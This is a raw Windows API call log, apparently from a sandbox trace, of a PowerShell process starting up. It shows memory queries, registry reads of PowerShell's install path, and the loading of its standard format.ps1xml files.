	[0276.407] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.411] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0276.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.411] CoTaskMemFree (pv=0x1b8428b0) 
	[0276.413] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.422] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.422] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.422] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.423] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.423] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.423] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.424] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.425] VirtualQuery (in: lpAddress=0xcc370, lpBuffer=0xcd230, dwLength=0x30 | out: lpBuffer=0xcd230*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0276.426] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd828 | out: phkResult=0xcd828*=0x304) returned 0x0
	[0276.426] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0xcd83c, lpData=0x0, lpcbData=0xcd838*=0x0 | out: lpType=0xcd83c*=0x1, lpData=0x0, lpcbData=0xcd838*=0x74) returned 0x0
	[0276.426] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0xcd7ac, lpData=0x0, lpcbData=0xcd7a8*=0x0 | out: lpType=0xcd7ac*=0x1, lpData=0x0, lpcbData=0xcd7a8*=0x74) returned 0x0
	[0276.426] CoTaskMemAlloc (cb=0x78) returned 0x175190
	[0276.426] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0xcd77c, lpData=0x175190, lpcbData=0xcd778*=0x74 | out: lpType=0xcd77c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd778*=0x74) returned 0x0
	[0276.426] CoTaskMemFree (pv=0x175190) 
	[0276.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0276.426] SetErrorMode (uMode=0x1) returned 0x1
	[0276.426] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0276.426] SetErrorMode (uMode=0x1) returned 0x1
	[0276.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.427] SetErrorMode (uMode=0x1) returned 0x1
	[0276.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.427] SetErrorMode (uMode=0x1) returned 0x1
	[0276.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.427] SetErrorMode (uMode=0x1) returned 0x1
	[0276.427] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0276.427] SetErrorMode (uMode=0x1) returned 0x1
	[0276.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.428] SetErrorMode (uMode=0x1) returned 0x1
	[0276.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0276.428] SetErrorMode (uMode=0x1) returned 0x1
	[0276.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.428] SetErrorMode (uMode=0x1) returned 0x1
	[0276.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0276.428] SetErrorMode (uMode=0x1) returned 0x1
	[0276.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0276.428] SetErrorMode (uMode=0x1) returned 0x1
	[0276.428] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0276.428] SetErrorMode (uMode=0x1) returned 0x1
	[0276.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0276.429] SetErrorMode (uMode=0x1) returned 0x1
	[0276.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0276.429] SetErrorMode (uMode=0x1) returned 0x1
	[0276.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0276.429] SetErrorMode (uMode=0x1) returned 0x1
	[0276.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0276.429] SetErrorMode (uMode=0x1) returned 0x1
	[0276.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0276.430] SetErrorMode (uMode=0x1) returned 0x1
	[0276.430] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0276.430] SetErrorMode (uMode=0x1) returned 0x1
	[0276.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0276.430] SetErrorMode (uMode=0x1) returned 0x1
	[0276.430] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd700 | out: lpFileInformation=0xcd700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0276.430] SetErrorMode (uMode=0x1) returned 0x1
	[0276.431] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0276.431] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.431] CoTaskMemFree (pv=0x1b8428b0) 
	[0276.433] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0276.433] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.433] CoTaskMemFree (pv=0x1b8428b0) 
	[0276.434] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0276.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.434] CoTaskMemFree (pv=0x1b8428b0) 
	[0276.434] CoTaskMemAlloc (cb=0x104) returned 0x1b8428b0
	[0276.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8428b0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0276.434] CoTaskMemFree (pv=0x1b8428b0) 
	[0276.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.435] SetErrorMode (uMode=0x1) returned 0x1
	[0276.435] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0276.962] GetFileType (hFile=0x308) returned 0x1
	[0276.962] SetErrorMode (uMode=0x1) returned 0x1
	[0276.962] GetFileType (hFile=0x308) returned 0x1
	[0276.962] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.963] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.963] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.964] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.964] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.964] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.964] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x9e2, lpOverlapped=0x0) returned 1
	[0276.964] ReadFile (in: hFile=0x308, lpBuffer=0x32bc7c2, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bc7c2*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0276.965] ReadFile (in: hFile=0x308, lpBuffer=0x32bd278, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32bd278*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0276.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.965] SetErrorMode (uMode=0x1) returned 0x1
	[0276.965] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd340 | out: lpFileInformation=0xcd340*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0276.965] SetErrorMode (uMode=0x1) returned 0x1
	[0276.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.966] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd428 | out: phkResult=0xcd428*=0x308) returned 0x0
	[0276.966] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd3ac, lpData=0x0, lpcbData=0xcd3a8*=0x0 | out: lpType=0xcd3ac*=0x1, lpData=0x0, lpcbData=0xcd3a8*=0x56) returned 0x0
	[0276.966] CoTaskMemAlloc (cb=0x5a) returned 0x1c65a0
	[0276.966] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd37c, lpData=0x1c65a0, lpcbData=0xcd378*=0x56 | out: lpType=0xcd37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd378*=0x56) returned 0x0
	[0276.966] CoTaskMemFree (pv=0x1c65a0) 
	[0276.966] RegCloseKey (hKey=0x308) returned 0x0
	[0276.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.966] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0276.970] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0x6f9357a9, Data2=0x203b, Data3=0x4e52, Data4=([0]=0xaa, [1]=0x51, [2]=0xa, [3]=0xdf, [4]=0xee, [5]=0x14, [6]=0xa2, [7]=0x84))) returned 0x0
	[0276.975] CoCreateGuid (in: pguid=0xcd650 | out: pguid=0xcd650*(Data1=0xf58ca623, Data2=0x397d, Data3=0x4a1e, Data4=([0]=0x92, [1]=0xca, [2]=0xaf, [3]=0xd4, [4]=0x7b, [5]=0x70, [6]=0xaf, [7]=0x89))) returned 0x0
	[0276.977] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.977] SetErrorMode (uMode=0x1) returned 0x1
	[0276.977] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0276.978] GetFileType (hFile=0x308) returned 0x1
	[0276.978] SetErrorMode (uMode=0x1) returned 0x1
	[0276.978] GetFileType (hFile=0x308) returned 0x1
	[0276.978] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.978] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.979] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.979] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.979] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0x1000, lpOverlapped=0x0) returned 1
	[0276.980] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0xfb2, lpOverlapped=0x0) returned 1
	[0276.980] ReadFile (in: hFile=0x308, lpBuffer=0x32e74fa, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e74fa*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0276.980] ReadFile (in: hFile=0x308, lpBuffer=0x32e7de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd398, lpOverlapped=0x0 | out: lpBuffer=0x32e7de0*, lpNumberOfBytesRead=0xcd398*=0x0, lpOverlapped=0x0) returned 1
	[0276.980] CloseHandle (hObject=0x308) returned 1
	[0276.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0276.981] SetErrorMode (uMode=0x1) returned 0x1
